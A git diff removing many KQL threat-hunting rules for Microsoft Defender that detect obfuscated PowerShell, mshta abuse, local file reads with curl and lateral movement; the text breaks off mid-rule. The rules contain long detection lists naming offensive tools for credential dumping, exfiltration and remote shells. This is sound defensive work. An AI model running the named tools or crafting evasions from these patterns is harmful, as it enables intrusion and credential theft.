Invoke-Obfuscation framework from the following code block -// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine matches regex "\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[" or ProcessCommandLine matches regex "\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[" or ProcessCommandLine matches regex "\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[" or ProcessCommandLine matches regex "\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}" or ProcessCommandLine matches regex "\\*mdr\\*\\W\\s*\\)\\.Name" or ProcessCommandLine matches regex "\\$VerbosePreference\\.ToString\\(" or ProcessCommandLine matches regex "\\[String\\]\\s*\\$VerbosePreference" \ No newline at end of file diff --git a/Execution/Invoke-Obfuscation_STDIN+_Launcher.kql b/Execution/Invoke-Obfuscation_STDIN+_Launcher.kql deleted file mode 100644 index 4108ea3f..00000000 --- a/Execution/Invoke-Obfuscation_STDIN+_Launcher.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Jonathan Cheong, oscd.community -// Date: 2020/10/15 -// Level: high -// Description: Detects Obfuscated use of stdin to execute PowerShell -// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine matches regex "cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\\"" \ No newline at end of file diff --git a/Execution/Invoke-Obfuscation_VAR++_LAUNCHER_OBFUSCATION.kql b/Execution/Invoke-Obfuscation_VAR++_LAUNCHER_OBFUSCATION.kql deleted file mode 100644 index e1957d0c..00000000 --- a/Execution/Invoke-Obfuscation_VAR++_LAUNCHER_OBFUSCATION.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Timur Zinniatullin, oscd.community -// Date: 2020/10/13 -// Level: high -// Description: Detects Obfuscated Powershell via VAR++ LAUNCHER -// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "{0}" or ProcessCommandLine contains "{1}" or ProcessCommandLine contains "{2}" or ProcessCommandLine contains "{3}" or ProcessCommandLine contains "{4}" or ProcessCommandLine contains "{5}") and (ProcessCommandLine contains "&&set" and ProcessCommandLine contains "cmd" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "-f") \ No newline at end of file diff --git a/Execution/Invoke-Obfuscation_VAR+_Launcher.kql b/Execution/Invoke-Obfuscation_VAR+_Launcher.kql deleted file mode 100644 index c5c03061..00000000 --- a/Execution/Invoke-Obfuscation_VAR+_Launcher.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Jonathan Cheong, oscd.community -// Date: 2020/10/15 -// Level: high -// Description: Detects Obfuscated use of Environment Variables to execute PowerShell -// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine matches regex "cmd.{0,5}(?:/c|/r)(?:\\s|)\\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\\"\\s+?\\-f(?:.*\\)){1,}.*\\"" \ No newline at end of file diff --git a/Execution/Invoke-Obfuscation_Via_Stdin.kql b/Execution/Invoke-Obfuscation_Via_Stdin.kql deleted file mode 100644 index c7d99e0d..00000000 --- a/Execution/Invoke-Obfuscation_Via_Stdin.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nikita Nazarov, oscd.community -// Date: 2020/10/12 -// Level: high -// Description: Detects Obfuscated Powershell via Stdin in Scripts -// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine matches regex "(?i)(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*"" \ No newline at end of file diff --git a/Execution/Invoke-Obfuscation_Via_Use_Clip.kql b/Execution/Invoke-Obfuscation_Via_Use_Clip.kql deleted file mode 100644 index b66ecade..00000000 --- a/Execution/Invoke-Obfuscation_Via_Use_Clip.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nikita Nazarov, oscd.community -// Date: 2020/10/09 -// Level: high -// Description: Detects Obfuscated Powershell via use Clip.exe in Scripts -// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine matches regex "(?i)echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?)" \ No newline at end of file diff --git a/Execution/Invoke-Obfuscation_Via_Use_MSHTA.kql b/Execution/Invoke-Obfuscation_Via_Use_MSHTA.kql deleted file mode 100644 index 7041f5ee..00000000 --- a/Execution/Invoke-Obfuscation_Via_Use_MSHTA.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nikita Nazarov, oscd.community -// Date: 2020/10/08 -// Level: high -// Description: Detects Obfuscated Powershell via use MSHTA in Scripts -// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine contains "set" and ProcessCommandLine contains "&&" and ProcessCommandLine contains "mshta" and ProcessCommandLine contains "vbscript:createobject" and ProcessCommandLine contains ".run" and ProcessCommandLine contains "(window.close)" \ No newline at end of file diff --git a/Execution/Java_Running_with_Remote_Debugging.kql b/Execution/Java_Running_with_Remote_Debugging.kql deleted file mode 100644 index f9e528bc..00000000 --- a/Execution/Java_Running_with_Remote_Debugging.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/01/16 -// Level: medium -// Description: Detects a JAVA process running with remote debugging allowing more than just localhost to connect -// Tags: attack.t1203, attack.execution -DeviceProcessEvents -| where (ProcessCommandLine contains "transport=dt_socket,address=" and (ProcessCommandLine contains "jre1." or ProcessCommandLine contains "jdk1.")) and (not((ProcessCommandLine contains "address=127.0.0.1" or ProcessCommandLine contains "address=localhost"))) \ No newline at end of file diff --git a/Execution/Local_File_Read_Using_Curl.EXE.kql b/Execution/Local_File_Read_Using_Curl.EXE.kql deleted file mode 100644 index f838af05..00000000 --- a/Execution/Local_File_Read_Using_Curl.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/07/27 -// Level: medium -// Description: Detects execution of "curl.exe" with the "file://" protocol handler in order to read local files. -// Tags: attack.execution -DeviceProcessEvents -| where ProcessCommandLine contains "file:///" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") \ No newline at end of file diff --git a/Execution/Logged-On_User_Password_Change_Via_Ksetup.EXE.kql b/Execution/Logged-On_User_Password_Change_Via_Ksetup.EXE.kql deleted file mode 100644 index 5749cb76..00000000 --- a/Execution/Logged-On_User_Password_Change_Via_Ksetup.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/04/06 -// Level: medium -// Description: Detects password change for the logged-on user's via "ksetup.exe" -// Tags: attack.execution -DeviceProcessEvents -| where ProcessCommandLine contains " /ChangePassword " and (FolderPath endswith "\\ksetup.exe" or ProcessVersionInfoOriginalFileName =~ "ksetup.exe") \ No newline at end of file diff --git a/Execution/MMC20_Lateral_Movement.kql b/Execution/MMC20_Lateral_Movement.kql deleted file mode 100644 index 4c7b0b92..00000000 --- a/Execution/MMC20_Lateral_Movement.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: @2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea) -// Date: 2020/03/04 -// Level: high -// Description: Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe -// Tags: attack.execution, attack.t1021.003 -DeviceProcessEvents -| where ProcessCommandLine contains "-Embedding" and FolderPath endswith "\\mmc.exe" and InitiatingProcessFolderPath endswith "\\svchost.exe" \ No newline at end of file diff --git a/Execution/MSHTA_Suspicious_Execution_01.kql b/Execution/MSHTA_Suspicious_Execution_01.kql deleted file mode 100644 index 280ba986..00000000 --- a/Execution/MSHTA_Suspicious_Execution_01.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule) -// Date: 2019/02/22 -// Level: high -// Description: Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism -// Tags: attack.defense_evasion, attack.t1140, attack.t1218.005, attack.execution, attack.t1059.007, cve.2020.1599 -DeviceProcessEvents -| where (ProcessCommandLine contains "vbscript" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".lnk" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".zip" or ProcessCommandLine contains ".dll") and FolderPath endswith "\\mshta.exe" \ No newline at end of file diff --git a/Execution/Malicious_Base64_Encoded_PowerShell_Keywords_in_Command_Lines.kql b/Execution/Malicious_Base64_Encoded_PowerShell_Keywords_in_Command_Lines.kql deleted file mode 100644 index 9385195f..00000000 --- a/Execution/Malicious_Base64_Encoded_PowerShell_Keywords_in_Command_Lines.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: John Lambert (rule) -// Date: 2019/01/16 -// Level: high -// Description: Detects base64 encoded strings used in hidden malicious PowerShell command lines -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA" or ProcessCommandLine contains "aXRzYWRtaW4gL3RyYW5zZmVy" or ProcessCommandLine contains "IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA" or ProcessCommandLine contains "JpdHNhZG1pbiAvdHJhbnNmZX" or ProcessCommandLine contains "YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg" or ProcessCommandLine contains "Yml0c2FkbWluIC90cmFuc2Zlc" or ProcessCommandLine contains "AGMAaAB1AG4AawBfAHMAaQB6AGUA" or ProcessCommandLine contains "JABjAGgAdQBuAGsAXwBzAGkAegBlA" or ProcessCommandLine contains "JGNodW5rX3Npem" or ProcessCommandLine contains "QAYwBoAHUAbgBrAF8AcwBpAHoAZQ" or ProcessCommandLine contains "RjaHVua19zaXpl" or ProcessCommandLine contains "Y2h1bmtfc2l6Z" or ProcessCommandLine contains "AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A" or ProcessCommandLine contains "kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg" or ProcessCommandLine contains "lPLkNvbXByZXNzaW9u" or ProcessCommandLine contains "SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA" or ProcessCommandLine contains "SU8uQ29tcHJlc3Npb2" or ProcessCommandLine contains "Ty5Db21wcmVzc2lvb" or ProcessCommandLine contains "AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ" or ProcessCommandLine contains "kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA" or ProcessCommandLine contains "lPLk1lbW9yeVN0cmVhb" or ProcessCommandLine contains "SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A" or ProcessCommandLine contains "SU8uTWVtb3J5U3RyZWFt" or ProcessCommandLine contains "Ty5NZW1vcnlTdHJlYW" or ProcessCommandLine contains "4ARwBlAHQAQwBoAHUAbgBrA" or ProcessCommandLine contains "5HZXRDaHVua" or ProcessCommandLine contains "AEcAZQB0AEMAaAB1AG4Aaw" or ProcessCommandLine contains "LgBHAGUAdABDAGgAdQBuAGsA" or ProcessCommandLine contains "LkdldENodW5r" or ProcessCommandLine contains "R2V0Q2h1bm" or ProcessCommandLine contains "AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A" or ProcessCommandLine contains "QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA" or ProcessCommandLine contains "RIUkVBRF9JTkZPNj" or ProcessCommandLine contains "SFJFQURfSU5GTzY0" or ProcessCommandLine contains "VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA" or ProcessCommandLine contains "VEhSRUFEX0lORk82N" or ProcessCommandLine contains "AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA" or ProcessCommandLine contains "cmVhdGVSZW1vdGVUaHJlYW" or ProcessCommandLine contains "MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA" or ProcessCommandLine contains "NyZWF0ZVJlbW90ZVRocmVhZ" or ProcessCommandLine contains "Q3JlYXRlUmVtb3RlVGhyZWFk" or ProcessCommandLine contains "QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA" or ProcessCommandLine contains "0AZQBtAG0AbwB2AGUA" or ProcessCommandLine contains "1lbW1vdm" or ProcessCommandLine contains "AGUAbQBtAG8AdgBlA" or ProcessCommandLine contains "bQBlAG0AbQBvAHYAZQ" or ProcessCommandLine contains "bWVtbW92Z" or ProcessCommandLine contains "ZW1tb3Zl") and ProcessCommandLine contains " hidden " and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/Execution/Malicious_PowerShell_Commandlets_-_ProcessCreation.kql b/Execution/Malicious_PowerShell_Commandlets_-_ProcessCreation.kql deleted file mode 100644 index dd255075..00000000 --- a/Execution/Malicious_PowerShell_Commandlets_-_ProcessCreation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/02 -// Level: high -// Description: Detects Commandlet names from well-known PowerShell exploitation frameworks -// Tags: attack.execution, attack.discovery, attack.t1482, attack.t1087, attack.t1087.001, attack.t1087.002, attack.t1069.001, attack.t1069.002, attack.t1069, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine contains "Add-Exfiltration" or ProcessCommandLine contains "Add-Persistence" or ProcessCommandLine contains "Add-RegBackdoor" or ProcessCommandLine contains "Add-RemoteRegBackdoor" or ProcessCommandLine contains "Add-ScrnSaveBackdoor" or ProcessCommandLine contains "Check-VM" or ProcessCommandLine contains "ConvertTo-Rc4ByteStream" or ProcessCommandLine contains "Decrypt-Hash" or ProcessCommandLine contains "Disable-ADIDNSNode" or ProcessCommandLine contains "Disable-MachineAccount" or ProcessCommandLine contains "Do-Exfiltration" or ProcessCommandLine contains "Enable-ADIDNSNode" or ProcessCommandLine contains "Enable-MachineAccount" or ProcessCommandLine contains "Enabled-DuplicateToken" or ProcessCommandLine contains "Exploit-Jboss" or ProcessCommandLine contains "Export-ADR" or ProcessCommandLine contains "Export-ADRCSV" or ProcessCommandLine contains "Export-ADRExcel" or ProcessCommandLine contains "Export-ADRHTML" or ProcessCommandLine contains "Export-ADRJSON" or ProcessCommandLine contains "Export-ADRXML" or ProcessCommandLine contains "Find-Fruit" or ProcessCommandLine contains "Find-GPOLocation" or ProcessCommandLine contains "Find-TrustedDocuments" or ProcessCommandLine contains "Get-ADIDNS" or ProcessCommandLine contains "Get-ApplicationHost" or ProcessCommandLine contains "Get-ChromeDump" or ProcessCommandLine contains "Get-ClipboardContents" or ProcessCommandLine contains "Get-FoxDump" or ProcessCommandLine contains "Get-GPPPassword" or ProcessCommandLine contains "Get-IndexedItem" or ProcessCommandLine contains "Get-KerberosAESKey" or ProcessCommandLine contains "Get-Keystrokes" or ProcessCommandLine contains "Get-LSASecret" or ProcessCommandLine contains "Get-MachineAccountAttribute" or ProcessCommandLine contains "Get-MachineAccountCreator" or ProcessCommandLine contains "Get-PassHashes" or ProcessCommandLine contains "Get-RegAlwaysInstallElevated" or ProcessCommandLine contains "Get-RegAutoLogon" or ProcessCommandLine contains "Get-RemoteBootKey" or ProcessCommandLine contains "Get-RemoteCachedCredential" or ProcessCommandLine contains "Get-RemoteLocalAccountHash" or ProcessCommandLine contains "Get-RemoteLSAKey" or ProcessCommandLine contains "Get-RemoteMachineAccountHash" or ProcessCommandLine contains "Get-RemoteNLKMKey" or ProcessCommandLine contains "Get-RickAstley" or ProcessCommandLine contains "Get-Screenshot" or ProcessCommandLine contains "Get-SecurityPackages" or ProcessCommandLine contains "Get-ServiceFilePermission" or ProcessCommandLine contains "Get-ServicePermission" or ProcessCommandLine contains "Get-ServiceUnquoted" or ProcessCommandLine contains "Get-SiteListPassword" or ProcessCommandLine contains "Get-System" or ProcessCommandLine contains "Get-TimedScreenshot" or ProcessCommandLine contains "Get-UnattendedInstallFile" or ProcessCommandLine contains "Get-Unconstrained" or ProcessCommandLine contains "Get-USBKeystrokes" or ProcessCommandLine contains "Get-VaultCredential" or ProcessCommandLine contains "Get-VulnAutoRun" or ProcessCommandLine contains "Get-VulnSchTask" or ProcessCommandLine contains "Grant-ADIDNSPermission" or ProcessCommandLine contains "Gupt-Backdoor" or ProcessCommandLine contains "HTTP-Login" or ProcessCommandLine contains "Install-ServiceBinary" or ProcessCommandLine contains "Install-SSP" or ProcessCommandLine contains "Invoke-ACLScanner" or ProcessCommandLine contains "Invoke-ADRecon" or ProcessCommandLine contains "Invoke-ADSBackdoor" or ProcessCommandLine contains "Invoke-AgentSmith" or ProcessCommandLine contains "Invoke-AllChecks" or ProcessCommandLine contains "Invoke-ARPScan" or ProcessCommandLine contains "Invoke-AzureHound" or ProcessCommandLine contains "Invoke-BackdoorLNK" or ProcessCommandLine contains "Invoke-BadPotato" or ProcessCommandLine contains "Invoke-BetterSafetyKatz" or ProcessCommandLine contains "Invoke-BypassUAC" or ProcessCommandLine contains "Invoke-Carbuncle" or ProcessCommandLine contains "Invoke-Certify" or ProcessCommandLine contains "Invoke-ConPtyShell" or ProcessCommandLine contains "Invoke-CredentialInjection" or ProcessCommandLine contains "Invoke-DAFT" or ProcessCommandLine contains "Invoke-DCSync" or ProcessCommandLine contains "Invoke-DinvokeKatz" or ProcessCommandLine contains "Invoke-DllInjection" or ProcessCommandLine contains "Invoke-DNSUpdate" or ProcessCommandLine contains "Invoke-DomainPasswordSpray" or ProcessCommandLine contains "Invoke-DowngradeAccount" or ProcessCommandLine contains "Invoke-EgressCheck" or ProcessCommandLine contains "Invoke-Eyewitness" or ProcessCommandLine contains "Invoke-FakeLogonScreen" or ProcessCommandLine contains "Invoke-Farmer" or ProcessCommandLine contains "Invoke-Get-RBCD-Threaded" or ProcessCommandLine contains "Invoke-Gopher" or ProcessCommandLine contains "Invoke-Grouper" or ProcessCommandLine contains "Invoke-HandleKatz" or ProcessCommandLine contains "Invoke-ImpersonatedProcess" or ProcessCommandLine contains "Invoke-ImpersonateSystem" or ProcessCommandLine contains "Invoke-InteractiveSystemPowerShell" or ProcessCommandLine contains "Invoke-Internalmonologue" or ProcessCommandLine contains "Invoke-Inveigh" or ProcessCommandLine contains "Invoke-InveighRelay" or ProcessCommandLine contains "Invoke-KrbRelay" or ProcessCommandLine contains "Invoke-LdapSignCheck" or ProcessCommandLine contains "Invoke-Lockless" or ProcessCommandLine contains "Invoke-MalSCCM" or ProcessCommandLine contains "Invoke-Mimikatz" or ProcessCommandLine contains "Invoke-Mimikittenz" or ProcessCommandLine contains "Invoke-MITM6" or ProcessCommandLine contains "Invoke-NanoDump" or ProcessCommandLine contains "Invoke-NetRipper" or ProcessCommandLine contains "Invoke-Nightmare" or ProcessCommandLine contains "Invoke-NinjaCopy" or ProcessCommandLine contains "Invoke-OfficeScrape" or ProcessCommandLine contains "Invoke-OxidResolver" or ProcessCommandLine contains "Invoke-P0wnedshell" or ProcessCommandLine contains "Invoke-Paranoia" or ProcessCommandLine contains "Invoke-PortScan" or ProcessCommandLine contains "Invoke-PoshRatHttp" or ProcessCommandLine contains "Invoke-PostExfil" or ProcessCommandLine contains "Invoke-PowerDump" or ProcessCommandLine contains "Invoke-PowerShellTCP" or ProcessCommandLine contains "Invoke-PowerShellWMI" or ProcessCommandLine contains "Invoke-PPLDump" or ProcessCommandLine contains "Invoke-PsExec" or ProcessCommandLine contains "Invoke-PSInject" or ProcessCommandLine contains "Invoke-PsUaCme" or ProcessCommandLine contains "Invoke-ReflectivePEInjection" or ProcessCommandLine contains "Invoke-ReverseDNSLookup" or ProcessCommandLine contains "Invoke-Rubeus" or ProcessCommandLine contains "Invoke-RunAs" or ProcessCommandLine contains "Invoke-SafetyKatz" or ProcessCommandLine contains "Invoke-SauronEye" or ProcessCommandLine contains "Invoke-SCShell" or ProcessCommandLine contains "Invoke-Seatbelt" or ProcessCommandLine contains "Invoke-ServiceAbuse" or ProcessCommandLine contains "Invoke-ShadowSpray" or ProcessCommandLine contains "Invoke-Sharp" or ProcessCommandLine contains "Invoke-Shellcode" or ProcessCommandLine contains "Invoke-SMBScanner" or ProcessCommandLine contains "Invoke-Snaffler" or ProcessCommandLine contains "Invoke-Spoolsample" or ProcessCommandLine contains "Invoke-SpraySinglePassword" or ProcessCommandLine contains "Invoke-SSHCommand" or ProcessCommandLine contains "Invoke-StandIn" or ProcessCommandLine contains "Invoke-StickyNotesExtract" or ProcessCommandLine contains "Invoke-SystemCommand" or ProcessCommandLine contains "Invoke-Tasksbackdoor" or ProcessCommandLine contains "Invoke-Tater" or ProcessCommandLine contains "Invoke-Thunderfox" or ProcessCommandLine contains "Invoke-ThunderStruck" or ProcessCommandLine contains "Invoke-TokenManipulation" or ProcessCommandLine contains "Invoke-Tokenvator" or ProcessCommandLine contains "Invoke-TotalExec" or ProcessCommandLine contains "Invoke-UrbanBishop" or ProcessCommandLine contains "Invoke-UserHunter" or ProcessCommandLine contains "Invoke-VoiceTroll" or ProcessCommandLine contains "Invoke-Whisker" or ProcessCommandLine contains "Invoke-WinEnum" or ProcessCommandLine contains "Invoke-winPEAS" or ProcessCommandLine contains "Invoke-WireTap" or ProcessCommandLine contains "Invoke-WmiCommand" or ProcessCommandLine contains "Invoke-WMIExec" or ProcessCommandLine contains "Invoke-WScriptBypassUAC" or ProcessCommandLine contains "Invoke-Zerologon" or ProcessCommandLine contains "MailRaider" or ProcessCommandLine contains "New-ADIDNSNode" or ProcessCommandLine contains "New-DNSRecordArray" or ProcessCommandLine contains "New-HoneyHash" or ProcessCommandLine contains "New-InMemoryModule" or ProcessCommandLine contains "New-MachineAccount" or ProcessCommandLine contains "New-SOASerialNumberArray" or ProcessCommandLine contains "Out-Minidump" or ProcessCommandLine contains "Port-Scan" or ProcessCommandLine contains "PowerBreach" or ProcessCommandLine contains "powercat " or ProcessCommandLine contains "PowerUp" or ProcessCommandLine contains "PowerView" or ProcessCommandLine contains "Remove-ADIDNSNode" or ProcessCommandLine contains "Remove-MachineAccount" or ProcessCommandLine contains "Remove-Update" or ProcessCommandLine contains "Rename-ADIDNSNode" or ProcessCommandLine contains "Revoke-ADIDNSPermission" or ProcessCommandLine contains "Set-ADIDNSNode" or ProcessCommandLine contains "Set-MacAttribute" or ProcessCommandLine contains "Set-MachineAccountAttribute" or ProcessCommandLine contains "Set-Wallpaper" or ProcessCommandLine contains "Show-TargetScreen" or ProcessCommandLine contains "Start-CaptureServer" or ProcessCommandLine contains "Start-Dnscat2" or ProcessCommandLine contains "Start-WebcamRecorder" or ProcessCommandLine contains "VolumeShadowCopyTools" \ No newline at end of file diff --git a/Execution/Malicious_PowerShell_Scripts_-_FileCreation.kql b/Execution/Malicious_PowerShell_Scripts_-_FileCreation.kql deleted file mode 100644 index 248f9cd5..00000000 --- a/Execution/Malicious_PowerShell_Scripts_-_FileCreation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein -// Date: 2018/04/07 -// Level: high -// Description: Detects the creation of known offensive powershell scripts used for exploitation -// Tags: attack.execution, attack.t1059.001 -DeviceFileEvents -| where (FolderPath endswith "\\Add-ConstrainedDelegationBackdoor.ps1" or FolderPath endswith "\\Add-Exfiltration.ps1" or FolderPath endswith "\\Add-Persistence.ps1" or FolderPath endswith "\\Add-RegBackdoor.ps1" or FolderPath endswith "\\Add-RemoteRegBackdoor.ps1" or FolderPath endswith "\\Add-ScrnSaveBackdoor.ps1" or FolderPath endswith "\\ADRecon.ps1" or FolderPath endswith "\\AzureADRecon.ps1" or FolderPath endswith "\\Check-VM.ps1" or FolderPath endswith "\\ConvertTo-ROT13.ps1" or FolderPath endswith "\\Copy-VSS.ps1" or FolderPath endswith "\\Create-MultipleSessions.ps1" or FolderPath endswith "\\DNS_TXT_Pwnage.ps1" or FolderPath endswith "\\dnscat2.ps1" or FolderPath endswith "\\Do-Exfiltration.ps1" or FolderPath endswith "\\DomainPasswordSpray.ps1" or FolderPath endswith "\\Download_Execute.ps1" or FolderPath endswith "\\Download-Execute-PS.ps1" or FolderPath endswith "\\Enable-DuplicateToken.ps1" or FolderPath endswith "\\Enabled-DuplicateToken.ps1" or FolderPath endswith "\\Execute-Command-MSSQL.ps1" or FolderPath endswith "\\Execute-DNSTXT-Code.ps1" or FolderPath endswith "\\Execute-OnTime.ps1" or FolderPath endswith "\\ExetoText.ps1" or FolderPath endswith "\\Exploit-Jboss.ps1" or FolderPath endswith "\\Find-AVSignature.ps1" or FolderPath endswith "\\Find-Fruit.ps1" or FolderPath endswith "\\Find-GPOLocation.ps1" or FolderPath endswith "\\Find-TrustedDocuments.ps1" or FolderPath endswith "\\FireBuster.ps1" or FolderPath endswith "\\FireListener.ps1" or FolderPath endswith "\\Get-ApplicationHost.ps1" or FolderPath endswith "\\Get-ChromeDump.ps1" or FolderPath endswith "\\Get-ClipboardContents.ps1" or FolderPath endswith "\\Get-ComputerDetail.ps1" or FolderPath endswith "\\Get-FoxDump.ps1" or FolderPath endswith "\\Get-GPPAutologon.ps1" or FolderPath endswith "\\Get-GPPPassword.ps1" or FolderPath endswith "\\Get-IndexedItem.ps1" or FolderPath endswith "\\Get-Keystrokes.ps1" or FolderPath endswith "\\Get-LSASecret.ps1" or FolderPath endswith "\\Get-MicrophoneAudio.ps1" or FolderPath endswith "\\Get-PassHashes.ps1" or FolderPath endswith "\\Get-PassHints.ps1" or FolderPath endswith "\\Get-RegAlwaysInstallElevated.ps1" or FolderPath endswith "\\Get-RegAutoLogon.ps1" or FolderPath endswith "\\Get-RickAstley.ps1" or FolderPath endswith "\\Get-Screenshot.ps1" or FolderPath endswith "\\Get-SecurityPackages.ps1" or FolderPath endswith "\\Get-ServiceFilePermission.ps1" or FolderPath endswith "\\Get-ServicePermission.ps1" or FolderPath endswith "\\Get-ServiceUnquoted.ps1" or FolderPath endswith "\\Get-SiteListPassword.ps1" or FolderPath endswith "\\Get-System.ps1" or FolderPath endswith "\\Get-TimedScreenshot.ps1" or FolderPath endswith "\\Get-UnattendedInstallFile.ps1" or FolderPath endswith "\\Get-Unconstrained.ps1" or FolderPath endswith "\\Get-USBKeystrokes.ps1" or FolderPath endswith "\\Get-VaultCredential.ps1" or FolderPath endswith "\\Get-VulnAutoRun.ps1" or FolderPath endswith "\\Get-VulnSchTask.ps1" or FolderPath endswith "\\Get-WebConfig.ps1" or FolderPath endswith "\\Get-WebCredentials.ps1" or FolderPath endswith "\\Get-WLAN-Keys.ps1" or FolderPath endswith "\\Gupt-Backdoor.ps1" or FolderPath endswith "\\HTTP-Backdoor.ps1" or FolderPath endswith "\\HTTP-Login.ps1" or FolderPath endswith "\\Install-ServiceBinary.ps1" or FolderPath endswith "\\Install-SSP.ps1" or FolderPath endswith "\\Invoke-ACLScanner.ps1" or FolderPath endswith "\\Invoke-ADSBackdoor.ps1" or FolderPath endswith "\\Invoke-AmsiBypass.ps1" or FolderPath endswith "\\Invoke-ARPScan.ps1" or FolderPath endswith "\\Invoke-BackdoorLNK.ps1" or FolderPath endswith "\\Invoke-BadPotato.ps1" or FolderPath endswith "\\Invoke-BetterSafetyKatz.ps1" or FolderPath endswith "\\Invoke-BruteForce.ps1" or FolderPath endswith "\\Invoke-BypassUAC.ps1" or FolderPath endswith "\\Invoke-Carbuncle.ps1" or FolderPath endswith "\\Invoke-Certify.ps1" or FolderPath endswith "\\Invoke-ConPtyShell.ps1" or FolderPath endswith "\\Invoke-CredentialInjection.ps1" or FolderPath endswith "\\Invoke-CredentialsPhish.ps1" or FolderPath endswith "\\Invoke-DAFT.ps1" or FolderPath endswith "\\Invoke-DCSync.ps1" or FolderPath endswith "\\Invoke-Decode.ps1" or FolderPath endswith "\\Invoke-DinvokeKatz.ps1" or FolderPath endswith "\\Invoke-DllInjection.ps1" or FolderPath endswith "\\Invoke-DNSUpdate.ps1" or FolderPath endswith "\\Invoke-DowngradeAccount.ps1" or FolderPath endswith "\\Invoke-EgressCheck.ps1" or FolderPath endswith "\\Invoke-Encode.ps1" or FolderPath endswith "\\Invoke-EventViewer.ps1" or FolderPath endswith "\\Invoke-Eyewitness.ps1" or FolderPath endswith "\\Invoke-FakeLogonScreen.ps1" or FolderPath endswith "\\Invoke-Farmer.ps1" or FolderPath endswith "\\Invoke-Get-RBCD-Threaded.ps1" or FolderPath endswith "\\Invoke-Gopher.ps1" or FolderPath endswith "\\Invoke-Grouper2.ps1" or FolderPath endswith "\\Invoke-Grouper3.ps1" or FolderPath endswith "\\Invoke-HandleKatz.ps1" or FolderPath endswith "\\Invoke-Interceptor.ps1" or FolderPath endswith "\\Invoke-Internalmonologue.ps1" or FolderPath endswith "\\Invoke-Inveigh.ps1" or FolderPath endswith "\\Invoke-InveighRelay.ps1" or FolderPath endswith "\\Invoke-JSRatRegsvr.ps1" or FolderPath endswith "\\Invoke-JSRatRundll.ps1" or FolderPath endswith "\\Invoke-KrbRelay.ps1" or FolderPath endswith "\\Invoke-KrbRelayUp.ps1" or 